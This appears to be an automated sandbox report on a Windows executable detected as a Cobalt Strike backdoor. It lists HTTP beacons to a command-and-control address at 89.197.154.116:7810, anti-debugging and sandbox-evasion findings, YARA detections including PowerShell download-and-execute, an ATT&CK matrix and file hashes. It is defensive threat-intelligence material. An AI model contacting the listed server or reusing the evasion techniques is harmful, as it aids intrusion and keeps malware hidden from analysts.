Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50056 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50063 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50064 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50065 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50066 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50067 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50069 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50070 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50075 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50076 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50077 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50078 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50081 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50082 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50083 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50084 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50085 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50086 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50087 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50088 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50089 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50090 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50091 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50092 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50097 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50098 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50099 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50100 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50101 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50103 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50104 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50105 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50109 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50110 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50111 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50112 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50115 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50117 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50119 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50120 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50122 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50123 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50124 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50125 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50126 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50127 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50129 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50130 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50132 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50133 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50134 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50135 -> 7810

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

Code function: 0_2_006801A8 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_006801A8

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_00675854		0_2_00675854
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_0066FA1C		0_2_0066FA1C

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

Window / User API: threadDelayed 9501

Jump to behavior

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Evasive API call chain: GetLocalTime,DecisionNodes			graph_0-37562
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_0-37704

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

API coverage: 6.5 %

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

Code function: 0_2_0066FA1C

0_2_0066FA1C

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe TID: 6568	Thread sleep count: 9501 > 30	Jump to behavior
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe TID: 6568	Thread sleep time: -95010000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe TID: 6496	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe TID: 6568	Thread sleep count: 343 > 30	Jump to behavior
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe TID: 6568	Thread sleep time: -3430000s >= -30000s	Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_00679220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,		0_2_00679220
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_00671C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,		0_2_00671C30

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: P3KxDOMmD3.exe, 00000000.00000003.2603494375.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.3720845976.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.3778925303.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1804978750.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1944131146.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.2876116472.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1856658291.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1926499944.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1786743074.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.2638951717.000000000076F000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

API call chain: ExitProcess graph end node

graph_0-37635

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep

graph_0-37303

Found potential dummy code loops (likely to delay analysis)

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

Process Stats: CPU usage > 42% for more than 60s

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

Code function: 0_2_0068F810 MultiByteToWideChar,MultiByteToWideChar,DebuggerProbe,DebuggerRuntime,IsDebuggerPresent,_RTC_GetSrcLine,WideCharToMultiByte,WideCharToMultiByte,

0_2_0068F810

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

Code function: 0_2_00689744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00689744

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

Code function: 0_2_0066D83C GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_0066D83C

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

Code function: 0_2_0068C0C8 _lseeki64_nolock,_lseeki64_nolock,GetProcessHeap,HeapAlloc,_errno,_errno,_setmode_nolock,__doserrno,_errno,_setmode_nolock,GetProcessHeap,HeapFree,_lseeki64_nolock,SetEndOfFile,_errno,__doserrno,GetLastError,_lseeki64_nolock,

0_2_0068C0C8

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,	0_2_00401180
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_00401A70 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	0_2_00401A70
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_004542E4 SetUnhandledExceptionFilter,	0_2_004542E4
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_00402F62 SetUnhandledExceptionFilter,	0_2_00402F62
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_006924F0 SetUnhandledExceptionFilter,	0_2_006924F0
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_006844D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_006844D0

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: P3KxDOMmD3.exe PID: 5480, type: MEMORYSTR

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

Code function: 0_2_0067DF50 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,

0_2_0067DF50

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

Code function: 0_2_00692050 AllocateAndInitializeSid,

0_2_00692050

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

Code function: 0_2_00401630 CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle,

0_2_00401630

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

Code function: 0_2_00401990 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00401990

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

Code function: 0_2_00675E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,

0_2_00675E28

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

Code function: 0_2_00675E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,

0_2_00675E28

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Remote Access Functionality

Yara detected CobaltStrike

Source: Yara match	File source: Process Memory Space: P3KxDOMmD3.exe PID: 5480, type: MEMORYSTR
Source: Yara match	File source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.P3KxDOMmD3.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_00676A78 socket,htons,ioctlsocket,closesocket,bind,listen,	0_2_00676A78
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_00676670 htonl,htons,socket,closesocket,bind,ioctlsocket,	0_2_00676670
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_00692630 bind,	0_2_00692630
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_0067EE8C socket,closesocket,htons,bind,listen,	0_2_0067EE8C

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	2 Valid Accounts	2 Valid Accounts	2 Valid Accounts	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	21 Access Token Manipulation	212 Virtualization/Sandbox Evasion	LSASS Memory	341 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Process Injection	21 Access Token Manipulation	Security Account Manager	212 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Process Injection	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	111 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	1 Account Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 File and Directory Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	4 System Information Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
P3KxDOMmD3.exe	87%	ReversingLabs	Win64.Backdoor.CobaltStrike
P3KxDOMmD3.exe	100%	Avira	HEUR/AGEN.1344321
P3KxDOMmD3.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://89.197.154.116:7810/cm	true		unknown
89.197.154.116	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://89.197.154.116:7810/cmZ	P3KxDOMmD3.exe, 00000000.00000003.1786743074.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1769347284.0000000000771000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://89.197.154.116:7810/cmuj	P3KxDOMmD3.exe, 00000000.00000003.3720845976.000000000076F000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://89.197.154.116:7810/cmV	P3KxDOMmD3.exe, 00000000.00000003.1804978750.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1926499944.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1786743074.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1769347284.0000000000771000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1822139187.000000000076F000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://89.197.154.116:7810/cmX	P3KxDOMmD3.exe, 00000000.00000003.1944131146.000000000076F000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://89.197.154.116:7810/cmN	P3KxDOMmD3.exe, 00000000.00000003.3498905059.000000000076F000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://89.197.154.116:7810/cmP	P3KxDOMmD3.exe, 00000000.00000003.2021917325.0000000000771000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.2002206918.0000000000771000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://89.197.154.116:7810/cmk.3v	P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000074C000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://89.197.154.116:7810/cmD	P3KxDOMmD3.exe, 00000000.00000003.2021917325.0000000000771000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.2002206918.0000000000771000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://89.197.154.116:7810/cm54.116:7810/cm	P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000074C000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://89.197.154.116:7810/cmy	P3KxDOMmD3.exe, 00000000.00000003.1856658291.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1892519888.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1839492147.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1873621134.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1822139187.000000000076F000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://89.197.154.116:7810/cm.d	P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000074C000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://89.197.154.116:7810/cmu	P3KxDOMmD3.exe, 00000000.00000003.1804978750.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1856658291.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1839492147.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1822139187.000000000076F000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://89.197.154.116:7810/cmx	P3KxDOMmD3.exe, 00000000.00000003.1804978750.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.3194894612.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000076F000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://89.197.154.116:7810/cmq	P3KxDOMmD3.exe, 00000000.00000003.2876116472.000000000076F000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://89.197.154.116:7810/cmr	P3KxDOMmD3.exe, 00000000.00000003.1944131146.000000000076F000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://89.197.154.116:7810/cmxu	P3KxDOMmD3.exe, 00000000.00000003.2620871241.000000000076F000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://89.197.154.116:7810/cmp	P3KxDOMmD3.exe, 00000000.00000003.1856658291.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.2638951717.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.2492373736.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.4084894276.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1873621134.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000076F000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://89.197.154.116:7810/cm54.116:7810/cmay	P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000074C000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://89.197.154.116:7810/cmj	P3KxDOMmD3.exe, 00000000.00000003.1769347284.0000000000771000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://89.197.154.116:7810/cmh	P3KxDOMmD3.exe, 00000000.00000003.3194894612.000000000076F000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://89.197.154.116:7810/cmVA	P3KxDOMmD3.exe, 00000000.00000003.2603494375.000000000076F000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://127.0.0.1:%u/	P3KxDOMmD3.exe, 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	false	unknown
http://89.197.154.116:7810/cmc	P3KxDOMmD3.exe, 00000000.00000003.1786743074.000000000076F000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://89.197.154.116:7810/cmk.py	P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000074C000.00000004.00000020.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
89.197.154.116	unknown	United Kingdom		47474	VIRTUAL1GB	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528400
Start date and time:	2024-10-07 21:59:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	P3KxDOMmD3.exe renamed because original name is a hash value
Original Sample Name:	b079e06ca60cf07b35abd19e225d3e1c.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/0@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 15 Number of non-executed functions: 165
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
VT rate limit hit for: P3KxDOMmD3.exe

Simulations

Behavior and APIs

Time	Type	Description
16:00:01	API Interceptor	15363399x Sleep call for process: P3KxDOMmD3.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
89.197.154.116	file.exe	Get hash	malicious	CobaltStrike	Browse	89.197.154.116:7810/push
	file.exe	Get hash	malicious	CobaltStrike	Browse	89.197.154.116:7810/load
	file.exe	Get hash	malicious	CobaltStrike	Browse	89.197.154.116:7810/ptj
	file.exe	Get hash	malicious	CobaltStrike	Browse	89.197.154.116:7810/IE9CompatViewList.xml
	file.exe	Get hash	malicious	CobaltStrike	Browse	89.197.154.116:7810/pixel
	ZnbEj6OQ7e.exe	Get hash	malicious	CobaltStrike	Browse	89.197.154.116:7810/pixel
	YpJ4EZPgHX.exe	Get hash	malicious	CobaltStrike	Browse	89.197.154.116:7810/dpixel
	FKfLumFBx9.exe	Get hash	malicious	Unknown	Browse	89.197.154.116:7810/O6Z_Oh2DCu_X-db4sYLFEg1hYXRf_R2oUsq-2FBCe7OY5fyzWx30F0mf2_tTjbnFbloJRApsw
	knuBp1Y6Rl.dll	Get hash	malicious	Unknown	Browse	89.197.154.116:7810/r0YP8_HZj6Xh9eD0h471LAg3P8LpTQjBwuoVU2_qOmLbrRhD7dzVzwh4X1zqWkGpdfKoeGcDyWqM5Vj7W_USDDh
	15xc2BVlS0.exe	Get hash	malicious	CobaltStrike	Browse	89.197.154.116:7810/ga.js

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
VIRTUAL1GB	lNymIO2RVq.vbs	Get hash	malicious	Metasploit	Browse	89.197.154.116
	DRVf7H9j4V.exe	Get hash	malicious	Metasploit	Browse	89.197.154.115
	Xwl3DsNmN2.exe	Get hash	malicious	CobaltStrike, Metasploit, ReflectiveLoader	Browse	89.197.154.115
	Windows11.exe	Get hash	malicious	Metasploit	Browse	193.117.208.101
	Trial.bat	Get hash	malicious	Empire	Browse	193.117.208.101
	Ti1p9tvbSW.exe	Get hash	malicious	Metasploit	Browse	89.197.154.116
	NUBuymtQ4b.exe	Get hash	malicious	Metasploit	Browse	89.197.154.116
	ealpZ0zoQi.exe	Get hash	malicious	Metasploit	Browse	89.197.154.116
	pA826G7Zi6.exe	Get hash	malicious	Metasploit	Browse	89.197.154.116
	SecuriteInfo.com.Linux.Siggen.9999.18891.22819.elf	Get hash	malicious	Unknown	Browse	89.197.225.199

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.186234474904441
TrID:	Win64 Executable (generic) (12005/4) 74.80% Generic Win/DOS Executable (2004/3) 12.49% DOS Executable Generic (2002/1) 12.47% VXD Driver (31/22) 0.19% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	P3KxDOMmD3.exe
File size:	328'704 bytes
MD5:	b079e06ca60cf07b35abd19e225d3e1c
SHA1:	9f707057f162e7b6b6a51fd0b8ad1f155ae6438b
